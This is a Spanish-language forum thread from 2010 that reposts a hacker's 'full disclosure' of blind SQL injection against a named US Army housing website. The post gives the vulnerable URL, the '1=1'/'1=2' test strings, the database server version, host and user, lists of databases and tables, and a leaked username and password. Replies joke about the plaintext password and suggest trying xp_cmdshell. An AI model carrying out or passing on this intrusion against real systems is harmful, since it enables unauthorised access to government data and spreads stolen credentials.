Blind SQL injection en una Web de las fuerzas des-armadas de USA

kamsky · 14 Enero 2010, 12:38 PM

/\ (_) |
/ \ _ __ _ __ ___ _ _ _ __ ___ _| |
/ /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
/ ____ \| | | | | | | | |_| |_| | | | | | | |
/_/ \_\_| |_| |_| |_|\__, (_)_| |_| |_|_|_|
__/ |
|___/

The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil
This website is vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.
Testing:
and 1=1– (True)

and 1=2– (False)

Ok, in this picture we can see all main informations about webserver.

Main information:

Citar
Código [Seleccionar] Expandir
[b]#Version[/b]: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2 [b]#User[/b]: Dynatouch [b]#Database[/b]: AHOS [b]#Host Name[/b]: AHSGSVDAHQIT130

All databases:

Citar
Código [Seleccionar] Expandir
[0] AHOS [1] master [2] tempdb [3] model [4] msdb [5] AHOS [6] AHIT_WEB [7] AHOS_HQD [8] AHOS_WL [9] HEAT [10] REF_DB [11] ReportDB [12] USAREUR_TEST [13] YARDI_CONV [14] HOMES_IFS [15] HOMES_CDB_USAREUR [16] HOMES_WHSE [17] HUACFSDIS102148 [18] PINEA4CASTLE [19] HOMES_CDB [20] GFOQ_Development [21] ARTI02036THS003 [22] BISM5843235S301 [23] CDAR0413DPWS001 [24] CHAB000639BS002 [25] FRSA1050WHDS212 [26] GGDE0032284S005 [27] GRAF0244HOUS001 [28] HDCS3980WHDS204 [29] Spotlight [30] LEDW0003SWFS002 [31] LEDW0252GSWS003 [32] NHQA4106WDAS101 [33] PANS2913GSTS001 [34] PION0011414S601 [35] SEMI0022DPWS002 [36] SULL0255WMAS001 [37] VCAM0107HOUS001 [38] WARN7114279S003 [39] WETZ8876222S210 [40] WIAF1023221S001 [41] LEDW0252GSWS001 [42] BUCHAHOMES01 [43] CASEA4KORHOU068 [44] GREE305APDPW001 [45] HNRYA4KOA4HG086 [46] HUMPA1KODPWH014 [47] RICH123A0PHO001 [48] SCHOU01A4DPWHMS [49] TORIDPWA4177105 [50] WAIN224DB003153 [51] YONGA4KODPHD995 [52] ZAMADPWA0067011 [53] ANADA1HOMES [54] APGRA0GAG-HOMES [55] BENNA0I32214251 [56] BLISSVDPW1HS001 [57] BRAGA4PWAJ18145 [58] CARSDPWXAPS0002 [59] DAEN3104WKLS005 [60] DAMIAP06 [61] DIXXAPRDPW00001 [62] DRUMA001VA11202 [63] DUGWITA4HOMES [64] EUSTDB13HOMES01 [65] FS-HOMES01 [66] FTBELVOIR_S001 [67] GAHSGHOMES [68] GORDDBRCP001 [69] HAMIA1206DPW008 [70] HAWTA0HOMES [71] HIALA0KOA4HG170 [72] HOODA0DPWSYS003 [73] IRWIIMA0HOMES3 [74] JACKDLEHOMES [75] KNOXDBOSNT2 [76] KS-HSG-HOMES

We can access information_schema, so let's see the tables from principal database "AHOS"

Citar
Código [Seleccionar] Expandir
[0] comd_list [1] dtproperties [2] Faqs [3] Faqs_Categories [4] Forms [5] forms_base [6] gBase [7] gBase_OLD [8] gCountries [9] gHousing_offices [10] gHousing_offices-old [11] gStates [12] Housing_off_post [13] Housing_phone_qr [14] mgr_login [15] mgr_login_OLD [16] mgr_login_passwords [17] mgr_login_save [18] MgrCorner_Configuration [19] MgrCorner_Configuration_ID [20] must_know [21] must_know_cat [22] Must_know_OLD [23] sysconstraints [24] syssegments [25] UPH [26] UPH_OLD [27] uph_photo_text [28] uph_photo_tours [29] uph_photos [30] v_mapview [31] V_RankView [32] vHousingAreas [33] vhqd_vrtours [34] VIEW_housing [35] VIEW_phototours [36] VIEW_vrtours [37] vMapFiles [38] vMapOrder [39] vPhotoFiles [40] vPlan [41] vPlanFiles [42] vRank [43] vRankDesc [44] vRankRankDesc [45] waitlist [46] waitlist_items

Now, here are some interesting tables, like mgr_login_passwords.

Here i found user : password columns, with :

Citar
Código [Seleccionar] Expandir
#Username: Dynatouch #Password: AHOS

wtf!

That it's all! Bye, TinKode...

dejo el enlace: http://tinkode.baywords.com/index.php/2010/01/army-mil-full-disclosure/

Novlucker · 14 Enero 2010, 13:01 PM

Las contraseñas en texto plano!

Hay que mirar además los otros temas que tienen en ese blog, no solo la US Army ha quedado mal parada, hay temas para Kaspersky, Yahoo, ESET Nod, Apple, Nasa

Saludos

Van Hohenheim · 14 Enero 2010, 17:54 PM

jojo cierto se ve muy interesante la pagina

; y por lo que se ve en la web vulnerable usan sql server 2000, asi que considerando que son vulnerables a injecciones tal vez el xp_cmdshell este activado xD

Debci · 14 Enero 2010, 18:08 PM

Una pregunta, viendeo ese paper, si yo porbase una injecion usando ese ejemplo en la pagina, podria tener represalias legales?

Saludos

WHK · 14 Enero 2010, 21:01 PM

casi siempre las webs con mas reputación son las mas vulnerables a pesar que son los que mas gastan dinero. Talves en ves de gastar tanto dinero en crear la web deberían destinar una cantidad en auditar el sistema en busca de falencias.

Debci · 14 Enero 2010, 22:35 PM

Cita de: WHK en 14 Enero 2010, 21:01 PM
casi siempre las webs con mas reputación son las mas vulnerables a pesar que son los que mas gastan dinero. Talves en ves de gastar tanto dinero en crear la web deberían destinar una cantidad en auditar el sistema en busca de falencias.

Wow no tenia ni idea, es cierto que a veces gastan mas en que quede bonita y tal...
Será cuestion de investigarlo...

Saludos

HuSSe19 · 12 Marzo 2010, 08:01 AM

cuanto mas grande sea una web, mas posibilidad hay de que tenga bugs

RON06 · 13 Marzo 2010, 11:17 AM

Cita de: HuSSe19 en 12 Marzo 2010, 08:01 AM
cuanto mas grande sea una web, mas posibilidad hay de que tenga bugs

Exacto estoy contigo... es decir cuanto más código más probabilidad de error